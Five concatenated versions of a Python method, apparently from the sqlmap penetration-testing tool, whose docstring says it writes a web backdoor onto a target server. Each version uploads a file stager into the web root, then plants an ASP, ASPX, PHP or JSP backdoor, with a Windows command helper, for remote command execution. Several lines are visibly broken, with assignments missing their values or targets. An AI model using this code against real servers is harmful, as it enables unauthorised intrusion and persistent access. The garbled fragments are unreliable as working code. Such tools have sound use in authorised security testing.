def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: return self.checkDbmsOs() infoMsg = "trying to upload the file stager" default = None choices = ('asp', 'aspx', 'php', 'jsp') for ext in choices: if conf.url.endswith(ext): default = ext break if not default: if Backend.isOs(OS.WINDOWS): default = "asp" else: default = "php" message = "which web application language does the web server " message += "support?\n" for count in xrange(len(choices)): ext = choices[count] message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) if default == ext: default = count + 1 message = message[:-1] while True: choice = readInput(message, default=str(default)) if not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: self.webApi = choices[int(choice) - 1] break kb.docRoot = getDocRoot() directories = getDirs() directories = list(directories) directories.sort() backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) originalBackdoorContent = backdoorContent = stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) warned = set() success = False for i in xrange(len(kb.docRoot)): if success: break for j in xrange(len(directories)): docRoot = kb.docRoot[i] directory = directories[j] uriPath = "" if not all(isinstance(item, basestring) for item in [docRoot, directory]): continue directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/') docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/') # '' or '/' -> 'docRoot' if not directory: localPath = docRoot uriPath = '/' # 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3' elif not isWindowsDriveLetterPath(directory) and directory[0] != '/': localPath = "%s/%s" % (docRoot, directory) uriPath = "/%s" % directory else: localPath = directory uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot if docRoot in uriPath: uriPath = uriPath.replace(docRoot, "/") uriPath = "/%s" % normalizePath(uriPath) else: webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url) if webDir: uriPath = "/%s" % webDir else: continue localPath = posixpath.normpath(localPath).rstrip('/') uriPath = posixpath.normpath(uriPath).rstrip('/') # Upload the file stager self.__webFileInject(stagerContent, stagerName, localPath) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName) uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" not in uplPage: if localPath not in warned: warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % localPath logger.warn(warnMsg) warned.add(localPath) continue elif "<%" in uplPage or "<?" in uplPage: warnMsg = "file stager uploaded " warnMsg += "on '%s' but not dynamically interpreted" % localPath logger.warn(warnMsg) continue elif self.webApi == "aspx": = extractRegexResult(r"__EVENTVALIDATION[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I) = extractRegexResult(r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I) infoMsg = "the file stager has been successfully uploaded " infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl) if self.webApi == "asp": runcmdName = "tmpe%s.exe" % randomStr(lowercase=True) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) match ='input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: backdoorDirectory = else: continue backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorStream.file.truncate() backdoorStream.write(backdoorContent) if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory else: continue else: if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath): warnMsg = "backdoor has not been successfully uploaded " warnMsg += "through the file stager possibly because " warnMsg += "the user running the web server process " warnMsg += "has not write privileges over the folder " warnMsg += "where the user running the DBMS process " warnMsg += "was able to upload the file stager or " warnMsg += "because the DBMS and web server sit on " warnMsg += "different servers" logger.warn(warnMsg) message = "do you want to try the same method used " message += "for the file stager? [Y/n] " getOutput = readInput(message, default="Y") if getOutput in ("y", "Y"): self.__webFileInject(backdoorContent, backdoorName, localPath) else: continue self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = localPath infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s' - " % self.webDirectory infoMsg += self.webBackdoorUrl success = True break
def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: return self.checkDbmsOs() infoMsg = "trying to upload the file stager" default = None choices = ['asp', 'aspx', 'php', 'jsp'] for ext in choices: if conf.url.endswith(ext): default = ext break if not default: if kb.os == "Windows": default = "asp" else: default = "php" message = "which web application language does the web server " message += "support?\n" for count in xrange(len(choices)): ext = choices[count] message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) if default == ext: default = count + 1 message = message[:-1] while True: choice = readInput(message, default=str(default)) if not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: self.webApi = choices[int(choice) - 1] break kb.docRoot = getDocRoot(self.webApi) directories = getDirs(self.webApi) directories = list(directories) directories.sort() backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) originalBackdoorContent = backdoorContent = stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) for directory in directories: # Upload the file stager self.__webFileInject(stagerContent, stagerName, directory) requestDir = ntToPosixSlashes(directory) if not requestDir: continue if requestDir[-1] != '/': requestDir += '/' requestDir = requestDir.replace(ntToPosixSlashes(kb.docRoot), "/") if isWindowsDriveLetterPath(requestDir): requestDir = requestDir[2:] requestDir = normalizePath(requestDir).replace("//", "/") if requestDir[0] != '/': requestDir = '/' + requestDir self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName) self.webStagerUrl = ntToPosixSlashes(self.webStagerUrl.replace("./", "/")) uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) if "sqlmap file uploader" not in uplPage: warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % directory logger.warn(warnMsg) continue elif "<%" in uplPage or "<?" in uplPage: warnMsg = "file stager uploaded " warnMsg += "on '%s' but not dynamically interpreted ('%s')" % (directory, self.webStagerUrl) logger.warn(warnMsg) continue infoMsg = "the file stager has been successfully uploaded " infoMsg += "on '%s' ('%s')" % (directory, self.webStagerUrl) if self.webApi == "asp": runcmdName = "tmpe%s.exe" % randomStr(lowercase=True) runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) match ='input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: backdoorDirectory = else: continue backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorStream.file.truncate() backdoorStream.write(backdoorContent) if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName) self.webDirectory = backdoorDirectory else: continue else: if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory): warnMsg = "backdoor has not been successfully uploaded " warnMsg += "with file stager probably because of " warnMsg += "lack of write permission." logger.warn(warnMsg) message = "do you want to try the same method used " message += "for the file stager? [y/N] " getOutput = readInput(message, default="N") if getOutput in ("y", "Y"): self.__webFileInject(backdoorContent, backdoorName, directory) else: continue self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = directory infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl break
def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: return self.checkDbmsOs() infoMsg = "trying to upload the file stager" default = None choices = ['asp', 'aspx', 'php', 'jsp'] for ext in choices: if conf.url.endswith(ext): default = ext break if not default: if kb.os == "Windows": default = "asp" else: default = "php" message = "which web application language does the web server " message += "support?\n" for count in xrange(len(choices)): ext = choices[count] message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) if default == ext: default = count + 1 message = message[:-1] while True: choice = readInput(message, default=str(default)) if not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: self.webApi = choices[int(choice) - 1] break kb.docRoot = getDocRoot() directories = getDirs() directories = list(directories) directories.sort() backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorStream = decloakToNamedTemporaryFile( os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) originalBackdoorContent = backdoorContent = stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) stagerContent = decloak( os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) warned = set() success = False for i in xrange(len(kb.docRoot)): if success: break for j in xrange(len(directories)): docRoot = kb.docRoot[i] directory = directories[j] if not all( isinstance(item, basestring) for item in [docRoot, directory]): continue directory = ntToPosixSlashes(normalizePath(directory)).replace( "//", "/").rstrip('/') docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace( "//", "/").rstrip('/') # '' or '/' -> 'docRoot' if not directory: localPath = docRoot uriPath = '/' # 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3' elif not isWindowsDriveLetterPath( directory) and directory[0] != '/': localPath = "%s/%s" % (docRoot, directory) uriPath = "/%s" % directory else: localPath = directory uriPath = directory[2:] if isWindowsDriveLetterPath( directory) else directory docRoot = docRoot[2:] if isWindowsDriveLetterPath( docRoot) else docRoot if docRoot in uriPath: uriPath = uriPath.replace(docRoot, "/") uriPath = "/%s" % normalizePath(uriPath) else: webDir = extractRegexResult( r"//[^/]+?/(?P<result>.*)/.", conf.url) if webDir: uriPath = "/%s" % webDir else: continue uriPath = uriPath.replace("//", "/").rstrip('/') localPath = localPath.rstrip('/') if not uriPath: uriPath = '/' # Upload the file stager self.__webFileInject(stagerContent, stagerName, localPath) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName) uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) if "sqlmap file uploader" not in uplPage: if localPath not in warned: warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % localPath logger.warn(warnMsg) warned.add(localPath) continue elif "<%" in uplPage or "<?" in uplPage: warnMsg = "file stager uploaded " warnMsg += "on '%s' but not dynamically interpreted" % localPath logger.warn(warnMsg) continue elif self.webApi == "aspx": = extractRegexResult( r"__EVENTVALIDATION[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I) = extractRegexResult( r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I) infoMsg = "the file stager has been successfully uploaded " infoMsg += "on '%s' ('%s')" % (localPath, self.webStagerUrl) if self.webApi == "asp": runcmdName = "tmpe%s.exe" % randomStr(lowercase=True) runcmdStream = decloakToNamedTemporaryFile( os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) match = r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: backdoorDirectory = else: continue backdoorContent = originalBackdoorContent.replace( "WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorStream.file.truncate() backdoorStream.write(backdoorContent) if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.webBackdoorUrl = "%s/Scripts/%s" % ( self.webBaseUrl.rstrip('/'), backdoorName) self.webDirectory = backdoorDirectory else: continue else: if not self.__webFileStreamUpload( backdoorStream, backdoorName, posixToNtSlashes(localPath) if kb.os == "Windows" else localPath): warnMsg = "backdoor has not been successfully uploaded " warnMsg += "with file stager probably because of " warnMsg += "lack of write permission." logger.warn(warnMsg) message = "do you want to try the same method used " message += "for the file stager? [y/N] " getOutput = readInput(message, default="N") if getOutput in ("y", "Y"): self.__webFileInject(backdoorContent, backdoorName, localPath) else: continue self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = localPath infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl success = True break
def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: return self.checkDbmsOs() infoMsg = "trying to upload the file stager" default = None choices = list(getPublicTypeMembers(WEB_API, True)) for ext in choices: if conf.url.endswith(ext): default = ext break if not default: if Backend.isOs(OS.WINDOWS): default = WEB_API.ASP else: default = WEB_API.PHP message = "which web application language does the web server " message += "support?\n" for count in xrange(len(choices)): ext = choices[count] message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else "")) if default == ext: default = count + 1 message = message[:-1] while True: choice = readInput(message, default=str(default)) if not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > len(choices): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: self.webApi = choices[int(choice) - 1] break kb.docRoot = getDocRoot() directories = sorted(getDirs()) backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorStream = decloakToNamedStream(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) originalBackdoorContent = backdoorContent = stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) success = False for docRoot in arrayizeValue(kb.docRoot): if success: break for directory in directories: uriPath = "" if not all(isinstance(_, basestring) for _ in (docRoot, directory)): continue directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/') docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/') # '' or '/' -> 'docRoot' if not directory: localPath = docRoot uriPath = '/' # 'dir1/dir2/dir3' -> 'docRoot/dir1/dir2/dir3' elif not isWindowsDriveLetterPath(directory) and directory[0] != '/': localPath = "%s/%s" % (docRoot, directory) uriPath = "/%s" % directory else: localPath = directory uriPath = directory[2:] if isWindowsDriveLetterPath(directory) else directory docRoot = docRoot[2:] if isWindowsDriveLetterPath(docRoot) else docRoot if docRoot in uriPath: uriPath = uriPath.replace(docRoot, "/") uriPath = "/%s" % normalizePath(uriPath) else: webDir = extractRegexResult(r"//[^/]+?/(?P<result>.*)/.", conf.url) if webDir: uriPath = "/%s" % webDir else: continue localPath = posixpath.normpath(localPath).rstrip('/') uriPath = posixpath.normpath(uriPath).rstrip('/') # Upload the file stager self.__webFileInject(stagerContent, stagerName, localPath) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName) self.webStagerFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, stagerName))).replace("//", "/").rstrip('/') uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" not in uplPage: warnMsg = "unable to upload the file stager " warnMsg += "on '%s'" % localPath singleTimeWarnMessage(warnMsg) if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): infoMsg = "trying to upload the file stager via " infoMsg += "UNION technique" handle, filename = mkstemp() os.fdopen(handle).close() # close low level handle (causing problems latter) with open(filename, "w+") as f: _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) _ = _.replace("WRITABLE_DIR", localPath.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else localPath) f.write(utf8encode(_)) self.unionWriteFile(filename, self.webStagerFilePath, "text") uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage = uplPage or "" if "sqlmap file uploader" not in uplPage: continue else: continue if "<%" in uplPage or "<?" in uplPage: warnMsg = "file stager uploaded on '%s', " % localPath warnMsg += "but not dynamically interpreted" logger.warn(warnMsg) continue elif self.webApi == WEB_API.ASPX: = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) = extractRegexResult(VIEWSTATE_REGEX, uplPage) infoMsg = "the file stager has been successfully uploaded " infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl) if self.webApi == WEB_API.ASP: runcmdName = "tmpe%s.exe" % randomStr(lowercase=True) runcmdStream = decloakToNamedStream(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName) match ='input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: backdoorDirectory = else: continue backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName) backdoorStream.truncate() backdoorStream.write(backdoorContent) if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory else: continue else: if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath): warnMsg = "backdoor has not been successfully uploaded " warnMsg += "through the file stager possibly because " warnMsg += "the user running the web server process " warnMsg += "has not write privileges over the folder " warnMsg += "where the user running the DBMS process " warnMsg += "was able to upload the file stager or " warnMsg += "because the DBMS and web server sit on " warnMsg += "different servers" logger.warn(warnMsg) message = "do you want to try the same method used " message += "for the file stager? [Y/n] " getOutput = readInput(message, default="Y") if getOutput in ("y", "Y"): self.__webFileInject(backdoorContent, backdoorName, localPath) else: continue self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = localPath self.webBackdoorFilePath = ntToPosixSlashes(normalizePath("%s/%s" % (localPath, backdoorName))).replace("//", "/").rstrip('/') testStr = "command execution test" output = self.webBackdoorRunCmd("echo %s" % testStr) if output and testStr in output: infoMsg = "the backdoor has been successfully " else: infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s' - " % self.webDirectory infoMsg += self.webBackdoorUrl success = True break
def webInit(self): """ This method is used to write a web backdoor (agent) on a writable remote directory within the web server document root. """ if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None: return self.checkDbmsOs() infoMsg = "trying to upload the uploader agent" message = "which web application language does the web server " message += "support?\n" message += "[1] ASP%s\n" % (" (default)" if kb.os == "Windows" else "") message += "[2] PHP%s\n" % ("" if kb.os == "Windows" else " (default)") message += "[3] JSP" while True: choice = readInput(message, default="1" if kb.os == "Windows" else "2") if not choice or choice == "2": self.webApi = "php" break elif choice == "1": self.webApi = "asp" break elif choice == "3": errMsg = "JSP web backdoor functionality is not yet " errMsg += "implemented" raise sqlmapUnsupportedDBMSException(errMsg) elif not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > 3: logger.warn("invalid value, it must be 1 or 3") kb.docRoot = getDocRoot(self.webApi) directories = getDirs(self.webApi) directories = list(directories) directories.sort() backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorStream = decloakToNamedTemporaryFile( os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName ) originalBackdoorContent = backdoorContent = uploaderName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi)) for directory in directories: # Upload the uploader agent self.__webFileInject(uploaderContent, uploaderName, directory) requestDir = ntToPosixSlashes(directory).replace(ntToPosixSlashes(kb.docRoot), "/") if isWindowsPath(requestDir): requestDir = requestDir[2:] requestDir = normalizePath(requestDir) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip("/"), uploaderName) self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/")) uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) if "sqlmap file uploader" not in uplPage: warnMsg = "unable to upload the uploader " warnMsg += "agent on '%s'" % directory logger.warn(warnMsg) continue infoMsg = "the uploader agent has been successfully uploaded " infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl) if self.webApi == "asp": runcmdName = "tmpe%s.exe" % randomStr(lowercase=True) runcmdStream = decloakToNamedTemporaryFile( os.path.join(paths.SQLMAP_SHELL_PATH, "runcmd.exe_"), runcmdName ) match ='input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: backdoorDirectory = else: continue backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace( "RUNCMD_EXE", runcmdName ) backdoorStream.file.truncate() backdoorStream.write(backdoorContent) if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip("/"), backdoorName) self.webDirectory = backdoorDirectory else: continue else: if not self.__webFileStreamUpload( backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory ): warnMsg = "backdoor hasn't been successfully uploaded " warnMsg += "with uploader probably because of permission " warnMsg += "issues." logger.warn(warnMsg) message = "do you want to try the same method used " message += "for uploader? [y/N] " getOutput = readInput(message, default="N") if getOutput in ("y", "Y"): self.__webFileInject(backdoorContent, backdoorName, directory) else: continue self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = directory infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl break